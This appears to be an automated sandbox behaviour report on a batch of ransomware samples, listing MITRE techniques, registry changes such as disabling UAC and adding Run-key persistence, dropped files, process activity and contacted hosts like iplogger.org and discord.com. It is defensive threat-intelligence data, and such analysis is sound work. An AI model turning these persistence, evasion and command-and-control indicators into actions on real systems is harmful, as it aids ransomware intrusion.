avoslocker | 4aeb68c64e5569df9948d6406af74f572366a856682d5642737ebf4f5466bd73

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	HEUR-Trojan-Ransom.Win32.Encoder.gen-35a3be045e57f3a0abdbae99984760eef0c3713189deabae330f501178f48e31.exe

Urelas
Urelas is a trojan targeting card games.
trojan urelas
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

ModiLoader Second Stage 2 IoCs

resource	yara_rule
behavioral1/memory/9932-1992-0x0000000000400000-0x000000000046F000-memory.dmp	modiloader_stage2
behavioral1/memory/9932-2574-0x0000000000400000-0x000000000046F000-memory.dmp	modiloader_stage2

Renames multiple (159) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Command and Scripting Interpreter: PowerShell 1 TTPs 34 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1744	powershell.exe
1020	powershell.exe
6952	powershell.exe
7924	powershell.exe
4676	powershell.exe
4080	powershell.exe
1056	powershell.exe
6964	powershell.exe
2992	powershell.exe
1620	powershell.exe
10128	powershell.exe
2680	powershell.exe
1084	powershell.exe
3300	powershell.exe
3684	powershell.exe
760	powershell.exe
1700	powershell.exe
1272	powershell.exe
3540	powershell.exe
5344	powershell.exe
6872	powershell.exe
6888	powershell.exe
5676	powershell.exe
3620	powershell.exe
6976	powershell.exe
4084	powershell.exe
5180	powershell.exe
3808	powershell.exe
5180	powershell.exe
7104	powershell.exe
7008	powershell.exe
3144	powershell.exe
2488	powershell.exe
6916	powershell.exe

ASPack v2.12-2.42 1 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral1/files/0x0007000000023481-854.dat	aspack_v212_v242

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	HEUR-Trojan-Ransom.Win32.Generic-e7974f558f498367cb1209f37181411662e83f5f522d8e7b48297361bf29506a.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	HEUR-Trojan-Ransom.Win32.Agent.gen-e50180a261801969db2574932e8deeac87a1efba53e50dbc1fc24a653a6b74bd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	HEUR-Trojan-Ransom.MSIL.Encoder.gen-b3ce84f48b34e821f18bfc828eb8da378d2531f7cc2bb16db82e11bead446b11.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	svchost32.exe

Executes dropped EXE 25 IoCs

pid	Process
3436	HEUR-Trojan-Ransom.MSIL.Blocker.gen-9c03d92ab53c3001c366424540352be8192e2b394fb086407fec1c5171092c2a.exe
2016	HEUR-Trojan-Ransom.MSIL.Blocker.gen-c11675751bb311049da57745dbae337eafd48db2ca17c4195de23ff9eb40c5b3.exe
3188	HEUR-Trojan-Ransom.MSIL.Encoder.gen-b3ce84f48b34e821f18bfc828eb8da378d2531f7cc2bb16db82e11bead446b11.exe
4372	HEUR-Trojan-Ransom.Win32.Agent.gen-e50180a261801969db2574932e8deeac87a1efba53e50dbc1fc24a653a6b74bd.exe
4724	HEUR-Trojan-Ransom.Win32.Cryptoff.vho-fbf8b45d1697677f1f3e080552bfc66e9db36d03f28b22cf7156f0cb156e71ff.exe
4744	HEUR-Trojan-Ransom.Win32.Cryptor.gen-5b7bed7349f6b1499b7eac111d7264101b13eeb9684830a4a93bab5f9d79d77e.exe
5672	svchost32.exe
5656	HEUR-Trojan-Ransom.Win32.Encoder.gen-35a3be045e57f3a0abdbae99984760eef0c3713189deabae330f501178f48e31.exe
5772	HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
5864	HEUR-Trojan-Ransom.Win32.GandCrypt.pef-ef8045de414c6a1ebbdc6ba03f14e832be975d14e6295d1c0c884768e8f53cdb.exe
6556	HEUR-Trojan-Ransom.Win32.Generic-3c0360acd0ce74cb44b8fb9bd2c8fcfac81a980ae108b2477d5fbdc17786cbc7.exe
6852	HEUR-Trojan-Ransom.Win32.Generic-e7974f558f498367cb1209f37181411662e83f5f522d8e7b48297361bf29506a.exe
4344	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5e6b3680047317ceea85b42cdf508204319b55fe183e42e86847efbd09f5ca80.exe
2316	HEUR-Trojan-Ransom.Win32.Stop.gen-c9cf26ceba119e99260cc610f71d5a8a25333442523e85f9cc0ff3ce293e117c.exe
2884	HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
2736	services32.exe
3932	HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
3520	HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
4568	HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
3680	HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
6860	HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
1492	HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
6956	HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
428	HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
5288	HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
9132	icacls.exe
4232	icacls.exe

UPX packed file 11 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1712-1746-0x0000000000400000-0x00000000004AA000-memory.dmp	upx
behavioral1/memory/9932-1992-0x0000000000400000-0x000000000046F000-memory.dmp	upx
behavioral1/files/0x000a00000002354e-2102.dat	upx
behavioral1/memory/1712-2162-0x0000000000400000-0x00000000004AA000-memory.dmp	upx
behavioral1/memory/9932-2574-0x0000000000400000-0x000000000046F000-memory.dmp	upx
behavioral1/memory/5772-3518-0x0000000000400000-0x0000000000448000-memory.dmp	upx
behavioral1/memory/2204-4566-0x0000000000400000-0x000000000087C000-memory.dmp	upx
behavioral1/memory/2204-5800-0x0000000000400000-0x000000000087C000-memory.dmp	upx
behavioral1/memory/6052-16411-0x0000000000400000-0x00000000004AA000-memory.dmp	upx
behavioral1/memory/8212-18754-0x0000000000400000-0x00000000004AA000-memory.dmp	upx
behavioral1/memory/5652-20811-0x0000000000400000-0x00000000004AA000-memory.dmp	upx

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\jnp5dz57we = "C:\\Users\\Admin\\Desktop\\00484\\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-fbf8b45d1697677f1f3e080552bfc66e9db36d03f28b22cf7156f0cb156e71ff.exe"	HEUR-Trojan-Ransom.Win32.Cryptoff.vho-fbf8b45d1697677f1f3e080552bfc66e9db36d03f28b22cf7156f0cb156e71ff.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchosted = "C:\\Users\\Admin\\AppData\\Roaming\\svchosted"	reg.exe

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	HEUR-Trojan-Ransom.Win32.Encoder.gen-35a3be045e57f3a0abdbae99984760eef0c3713189deabae330f501178f48e31.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	HEUR-Trojan-Ransom.Win32.Encoder.gen-35a3be045e57f3a0abdbae99984760eef0c3713189deabae330f501178f48e31.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs

Web Service

T1102

flow	ioc
71	iplogger.org
73	iplogger.org
74	iplogger.org
92	discord.com
93	discord.com
115	discord.com
128	discord.com

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
50	ip-api.com
62	api.2ip.ua
63	api.2ip.ua
81	api.2ip.ua
82	api.2ip.ua

Uses Tor communications 1 TTPs
Malware can proxy its traffic through Tor for more anonymity.

Proxy
T1090

Drops file in System32 directory 5 IoCs

description	ioc	Process
File created	C:\Windows\system32\services32.exe	svchost32.exe
File opened for modification	C:\Windows\system32\services32.exe	svchost32.exe
File created	C:\Windows\SysWOW64\HelpMe.exe	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5e6b3680047317ceea85b42cdf508204319b55fe183e42e86847efbd09f5ca80.exe
File opened for modification	C:\Windows\SysWOW64\HelpMe.exe	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5e6b3680047317ceea85b42cdf508204319b55fe183e42e86847efbd09f5ca80.exe
File created	C:\Windows\SysWOW64\notepad.exe.exe	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5e6b3680047317ceea85b42cdf508204319b55fe183e42e86847efbd09f5ca80.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

defense_evasion privilege_escalation

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\696116166.png"	reg.exe

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Internet Explorer\iexplore.exe.exe	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5e6b3680047317ceea85b42cdf508204319b55fe183e42e86847efbd09f5ca80.exe

Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs

Create Process with Token

T1134.002

pid	Process
3944	sevnz.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
1840	5864	WerFault.exe	137
5176	5772	WerFault.exe	547

System Location Discovery: System Language Discovery 1 TTPs 50 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5e6b3680047317ceea85b42cdf508204319b55fe183e42e86847efbd09f5ca80.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Encoder.gen-35a3be045e57f3a0abdbae99984760eef0c3713189deabae330f501178f48e31.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Generic-e7974f558f498367cb1209f37181411662e83f5f522d8e7b48297361bf29506a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Stop.gen-c9cf26ceba119e99260cc610f71d5a8a25333442523e85f9cc0ff3ce293e117c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Cryptor.gen-5b7bed7349f6b1499b7eac111d7264101b13eeb9684830a4a93bab5f9d79d77e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.GandCrypt.pef-ef8045de414c6a1ebbdc6ba03f14e832be975d14e6295d1c0c884768e8f53cdb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	dw20.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	dw20.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	dw20.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

Command and Scripting Interpreter

T1059

pid	Process
10132	ipconfig.exe

Kills process with taskkill 6 IoCs

evasion

pid	Process
8556	taskkill.exe
4956	taskkill.exe
8756	taskkill.exe
8748	taskkill.exe
7336	taskkill.exe
5116	taskkill.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings	HEUR-Trojan-Ransom.Win32.Agent.gen-e50180a261801969db2574932e8deeac87a1efba53e50dbc1fc24a653a6b74bd.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings	OpenWith.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

pid	Process
224	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
5868	schtasks.exe
9476	schtasks.exe
2880	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3124	powershell.exe
3124	powershell.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
2680	powershell.exe
2680	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4892	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 29 IoCs

description	pid	Process
Token: SeRestorePrivilege	3660	7zFM.exe
Token: 35	3660	7zFM.exe
Token: SeSecurityPrivilege	3660	7zFM.exe
Token: SeDebugPrivilege	3124	powershell.exe
Token: SeDebugPrivilege	2884	taskmgr.exe
Token: SeSystemProfilePrivilege	2884	taskmgr.exe
Token: SeCreateGlobalPrivilege	2884	taskmgr.exe
Token: SeDebugPrivilege	4892	taskmgr.exe
Token: SeSystemProfilePrivilege	4892	taskmgr.exe
Token: SeCreateGlobalPrivilege	4892	taskmgr.exe
Token: 33	2884	taskmgr.exe
Token: SeIncBasePriorityPrivilege	2884	taskmgr.exe
Token: SeDebugPrivilege	3188	HEUR-Trojan-Ransom.MSIL.Encoder.gen-b3ce84f48b34e821f18bfc828eb8da378d2531f7cc2bb16db82e11bead446b11.exe
Token: SeBackupPrivilege	4036	dw20.exe
Token: SeBackupPrivilege	4036	dw20.exe
Token: SeDebugPrivilege	4372	HEUR-Trojan-Ransom.Win32.Agent.gen-e50180a261801969db2574932e8deeac87a1efba53e50dbc1fc24a653a6b74bd.exe
Token: SeDebugPrivilege	2680	powershell.exe
Token: SeDebugPrivilege	6916	powershell.exe
Token: SeDebugPrivilege	3620	powershell.exe
Token: SeDebugPrivilege	5180	powershell.exe
Token: SeDebugPrivilege	5344	powershell.exe
Token: SeDebugPrivilege	5672	svchost32.exe
Token: SeDebugPrivilege	6556	HEUR-Trojan-Ransom.Win32.Generic-3c0360acd0ce74cb44b8fb9bd2c8fcfac81a980ae108b2477d5fbdc17786cbc7.exe
Token: SeDebugPrivilege	1744	powershell.exe
Token: SeDebugPrivilege	1084	powershell.exe
Token: SeDebugPrivilege	2736	services32.exe
Token: SeDebugPrivilege	760	powershell.exe
Token: SeDebugPrivilege	1020	powershell.exe
Token: SeDebugPrivilege	3300	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3660	7zFM.exe
3660	7zFM.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
4892	taskmgr.exe
2884	taskmgr.exe
4892	taskmgr.exe
2884	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
2884	taskmgr.exe
4892	taskmgr.exe
2884	taskmgr.exe
4892	taskmgr.exe
2884	taskmgr.exe
4892	taskmgr.exe
2884	taskmgr.exe
4892	taskmgr.exe
2884	taskmgr.exe
4892	taskmgr.exe
2884	taskmgr.exe
4892	taskmgr.exe
2884	taskmgr.exe
4892	taskmgr.exe
2884	taskmgr.exe
4892	taskmgr.exe
2884	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
2884	taskmgr.exe
4892	taskmgr.exe
2884	taskmgr.exe
4892	taskmgr.exe
2884	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
2884	taskmgr.exe
4892	taskmgr.exe
2884	taskmgr.exe
4892	taskmgr.exe
2884	taskmgr.exe
4892	taskmgr.exe
2884	taskmgr.exe
4892	taskmgr.exe
2884	taskmgr.exe
4892	taskmgr.exe
2884	taskmgr.exe
4892	taskmgr.exe
2884	taskmgr.exe
4892	taskmgr.exe
2884	taskmgr.exe
4892	taskmgr.exe
2884	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
1492	OpenWith.exe
3708	cmd.exe
3972	OpenWith.exe
5772	HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
5772	HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3124 wrote to memory of 3708	3124	powershell.exe	100
PID 3124 wrote to memory of 3708	3124	powershell.exe	100
PID 2884 wrote to memory of 4892	2884	taskmgr.exe	104
PID 2884 wrote to memory of 4892	2884	taskmgr.exe	104
PID 3708 wrote to memory of 3436	3708	cmd.exe	105
PID 3708 wrote to memory of 3436	3708	cmd.exe	105
PID 3708 wrote to memory of 2016	3708	cmd.exe	106
PID 3708 wrote to memory of 2016	3708	cmd.exe	106
PID 3708 wrote to memory of 3188	3708	cmd.exe	107
PID 3708 wrote to memory of 3188	3708	cmd.exe	107
PID 3708 wrote to memory of 4372	3708	cmd.exe	109
PID 3708 wrote to memory of 4372	3708	cmd.exe	109
PID 3188 wrote to memory of 3256	3188	HEUR-Trojan-Ransom.MSIL.Encoder.gen-b3ce84f48b34e821f18bfc828eb8da378d2531f7cc2bb16db82e11bead446b11.exe	108
PID 3188 wrote to memory of 3256	3188	HEUR-Trojan-Ransom.MSIL.Encoder.gen-b3ce84f48b34e821f18bfc828eb8da378d2531f7cc2bb16db82e11bead446b11.exe	108
PID 3436 wrote to memory of 4036	3436	HEUR-Trojan-Ransom.MSIL.Blocker.gen-9c03d92ab53c3001c366424540352be8192e2b394fb086407fec1c5171092c2a.exe	110
PID 3436 wrote to memory of 4036	3436	HEUR-Trojan-Ransom.MSIL.Blocker.gen-9c03d92ab53c3001c366424540352be8192e2b394fb086407fec1c5171092c2a.exe	110
